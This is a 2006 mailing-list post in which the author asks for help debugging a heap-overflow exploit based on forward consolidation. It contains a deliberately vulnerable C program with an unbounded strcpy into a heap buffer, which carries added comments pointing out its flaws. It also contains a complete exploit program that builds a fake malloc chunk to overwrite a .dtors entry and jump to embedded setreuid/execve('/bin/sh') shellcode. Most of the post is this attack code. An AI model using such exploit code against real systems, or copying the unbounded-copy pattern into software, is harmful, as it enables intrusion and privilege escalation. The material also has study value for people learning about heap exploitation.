Vulnerability Development mailing list archives

heap overflow forward consolidation


From: padre () correo ugr es
Date: Sat, 27 May 2006 01:27:26 +0200 (MEST)

Hi, I'm coding a heap overflow & exploit using forward consolidation.

I've been looking at the code for days, but I didn't see anything wrong.

Why doesn't my exploit work?

I think the fake chunk is constructed correctly, the padding is ok, the
size is ok.

Guys, can you tell me if the code is OK?? Maybe I forgot something
important (don't think so :-P)

Thanks in advance!!

-[ DTOR INFO]-----------------------------------------------

mooo@localhost:~$ nm a | grep DTOR
080497e4 d __DTOR_END__
080497e0 d __DTOR_LIST__

------------------------------------------------------------
THIS IS THE BUGGY CODE
------------------------------------------------------------
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/*
 * Deliberately vulnerable test program posted with the thread: two 250-byte
 * heap allocations, an unbounded strcpy() of argv[1] into the first, then a
 * free() of the overflowed chunk.  The two printf() calls after free() only
 * report whether the words at the two hard-coded .dtors addresses changed.
 *
 * Reviewer notes (what is wrong here, from a defender's point of view):
 *  - strcpy(p, argv[1]) has no length bound: any argv[1] longer than 249
 *    bytes writes past the end of p's 250-byte allocation.  This is the
 *    injected bug; a bounded copy such as snprintf(p, 250, "%s", argv[1])
 *    removes it.
 *  - argc is never checked; run without an argument, argv[1] is NULL and
 *    strcpy() dereferences it.
 *  - dtor_list / dtor_end are integer constants assigned to long* without a
 *    cast, and they are tied to one specific binary (the nm output above),
 *    so the program only "works" for that exact build.
 *  - "%08x" is used for pointer and long arguments; the matching specifiers
 *    are "%p" and "%lx".  A mismatched specifier is undefined behavior and
 *    the output cannot be trusted on a 64-bit build.
 *  - The if/else is unbraced and mis-indented; the else belongs to the if,
 *    but braces would make that explicit.
 */
int main (int argc, char **argv)
{

char *p,*p2;

p = (char*)malloc(250);                 /* the chunk argv[1] is copied into */
p2 = (char*)malloc(250);                /* second chunk; the thread's premise is that it is adjacent to p */
long *dtor_list = 0x080497e0;           /* hard-coded from `nm a | grep DTOR`; int -> pointer without cast */
long *dtor_end = 0x080497e4;

if (p && p2)
        printf("OK\n\n");
        else exit(-1);                  /* pairs with the if above despite the indentation */

printf ("p1 @ 0x%08x \n", p);           /* pointer printed with %x: should be %p */
printf ("p2 @ 0x%08x \n", p2);

strcpy(p,argv[1]);                      /* UNBOUNDED COPY into a 250-byte buffer; argc is not checked */

free(p);                                /* the free() the thread relies on for forward consolidation */

printf ("dtors_list @ 0x%08x = 0x%08x \n", dtor_list, *dtor_list);   /* long* and long printed with %x */
printf ("dtors_end @ 0x%08x = 0x%08x \n ", dtor_end, *dtor_end);

return 0;
}

----------------------------------------------------------
THIS IS THE EXPLOIT
----------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define TRASH 0xffffffff
#define FLAG 0x1

int SIZE=(256+16);

int main (int argc, char **argv){

char buffer[SIZE+1];

char sc[] =
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
        "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
        "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
        "\x68";

char *environ[]={sc,NULL};

long shellcode_addr = 0xbffffffa - strlen(sc) - strlen("./a");
long dtor_addr=0x080497e4;

memset (buffer,'A',SIZE);

*(int*)&buffer[(SIZE-16)] = (TRASH & ~FLAG);
*(int*)&buffer[(SIZE-12)] = -4;
*(int*)&buffer[(SIZE-8)] = (dtor_addr - 12);
*(int*)&buffer[(SIZE-4)] = (shellcode_addr + 8);

*(int*)&buffer[SIZE]='\0';

printf("-| Shellcode (%d bytes) @ 0x%08x\n",strlen(sc),shellcode_addr);
printf("-|-----------------------------------\n");
printf("-| DTOR_END @ 0x%08x\n", dtor_addr);

if ( execle("./a","a",buffer,environ) < 0)
        {
        perror ("execle ");
        }

        printf("something wrong :-S \n");

return 0;
}

--------------------------------------------------------------------------

